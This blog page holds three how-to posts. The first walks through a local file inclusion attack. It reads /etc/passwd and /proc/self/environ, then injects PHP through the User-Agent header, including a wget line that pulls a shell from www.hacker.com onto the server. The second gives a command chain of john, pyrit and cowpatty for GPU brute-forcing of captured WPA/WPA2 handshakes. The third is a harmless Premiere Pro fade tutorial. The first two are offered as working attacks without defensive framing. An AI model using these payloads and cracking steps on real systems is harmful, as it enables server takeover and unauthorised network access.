Categories
Security Tutorials

File Inclusion Attack

A file inclusion is a vulnerability which allows an attacker to access unauthorised file on web server and can execute the malicious code by using ‘include’ functional vulnerability. The local file inclusion LFI is a process of Including Local File available on webserver. This vulnerability occur when a user input contains the path of the file that has been included. When this input is not properly sanitised then an attacker give the some default files location and access all these sensitives files.

Lets suppose this website is vulnerable to local file inclusion attack:

www.roknifard.com/view.php?page=contact.php

Now lets replace contact.php with ../ and try the new URL:

www.roknifard.com/view.php?page=../|

Now after requesting this page we got an error. There is a big chance to have a Local File Inclusion vulnerability.

Warning: include(../) [function.include]: failed to open stream: No
such file or directory in /home/roknifard/public_html/roknifard.com/view.php on
line 1337

Now lets check for etc/passwd to see the if Local File Inclusion is vulnerable:

www.roknifard.com/view.php?page=../../../etc/passwd

we got an error and now we include more directories to look for etc/passwd file

www.roknifard.com/view.php?page=../../../../../etc/passwd

If you will get a page like the following, that means you have successfully Included a /etc/passwd file.

root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin 
operator:x:11:0:operator:/root:/sbin/nologin 
games:x:12:100:games:/usr/games:/sbin/nologin 
test:x:13:30:test:/var/test:/sbin/nologin 
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin 
nobody:x:99:99:Nobody:/:/sbin/nologin

We successfully included a file and our next step is to include a proc/self/environ file. So now replace /etc/passwd with /proc/self/environ file.

www.roknifard.com/view.php?page=../../../../../proc/self/environ

If you get something like the following, that means you have successfully included a proc/self/environ file.

DOCUMENT_ROOT=/home/roknifard/public_html GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml,
image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac
HTTP_HOST=www.roknifard.com
HTTP_REFERER=http://www.roknifard.com/index.php?view=../../../../../../etc/passwd 
HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00 
PATH=/bin:/usr/bin 
QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron 
REDIRECT_STATUS=200 
REMOTE_ADDR=6x.1xx.4x.1xx 
REMOTE_PORT=35665
REQUEST_METHOD=GET
REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenvir
on SCRIPT_FILENAME=/home/roknifard/public_html/index.php SCRIPT_NAME=/index.php
SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=webmaster@roknifard.com
SERVER_NAME=www.roknifard.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0
SERVER_SIGNATURE=
Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2
mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at
www.roknifard.com Port 80

proc/self/environ is accessible. If you got a blank page or an error, that means proc/self/environ is not accessible or the OS is a FreeBSD.

Now let’s inject our malicious code in proc/self/environ. We can inject our code in User-Agent HTTP Header. Use Tamper Data Add-on for Firefox to change the User-Agent. Start Tamper Data in Firefox and re-request the URL

www.roknifard.com/view.php?page=../../../../../proc/self/environ

Now Tamper this page and in user agent add you uploader script and then submit. You will get an uploader on /proc/self/environ page, just browse and upload your shell.

You can also upload your shell by downloading remotely using wget command.

<?system('wget www.hacker.com/shell.txt -O shell.php');?>

Add this command in user agent and request the page. Now our command is successfully executed and will download the .txt shell from www.hacker.com/shell.txt and save it as shell.php in the website directory. through system(), and our shell will be created. If didn’t work, try exec() because system() can be disabled on the webserver from php.ini.

Now lets check if our malicious code, if it was successfully injected. Lets check if the shell is present.

www.roknifard.com/shell.php

Our shell is there. Injection was successful.

Categories
Security Technology Tutorials

Brute-Force WPA/WPA2 via GPU without dictionary

I personally don’t like dictionary attacks, although many people still believe they are safe while their favorite passwords are from their personal data or from the nearest dictionary around.

Here, I will show you how to pipe different tools in order to crack a WPA/WPA2 protected WiFi by generating different passwords on-the-fly through GPU and use them in cracking process to find the match.

Before we start, you should check if your graphic card is CUDA enabled, as we need it in the process. But if you do not have a good graphic card, you can always rent a small elastic compute cluster from Amazon for a cheap price and do your job remotely.

First you need to capture a handshake. How you want to get it, I will leave it to you. After you got your handshake, you will have it in a *.cap file. Then send it through this chain of commands:

john --stdout --incremental:all | pyrit -e WIFIESSID -i - -o - passthrough | cowpatty -r yourhandshake.cap -d - -s WIFIESSID

The Pyrit uses GPU which eventually leads to a better performance in cracking process. Instead of Cowpatty you can also use Aircrack-ng.

I leave it to your imagination that how far it can go, and I am sure you have lots of ideas :D

Share your experiences with me. Happy high-speed cracking :)

Categories
Tutorials

How to fade in and fade out video and audio in Adobe Premiere Pro

First, I know that there are many ways this can be done, but this method that I usually use, is very handy and quick. Although it might not be very professional, but I can does the job for you, specially if you just need a quick work around.

I have prepared a video for this which at the end of this post you can watch it to get the idea better. The process of fading in and fading out for video and audio is very simple and handy.

  1. First we need to import our videos to timeline from Media Browser.
  2. From the Effects tab, search for Cross Dissolve and find it under Video Transition and drag it to the middle of two videos in your timeline.
  3. From the Effects tab, search for Constant Power and find it under Audio Transition and drag it to the middle of two audios in your timeline.
  4. Adjust the length of transitions for both audio and video as you need.

Watch it online: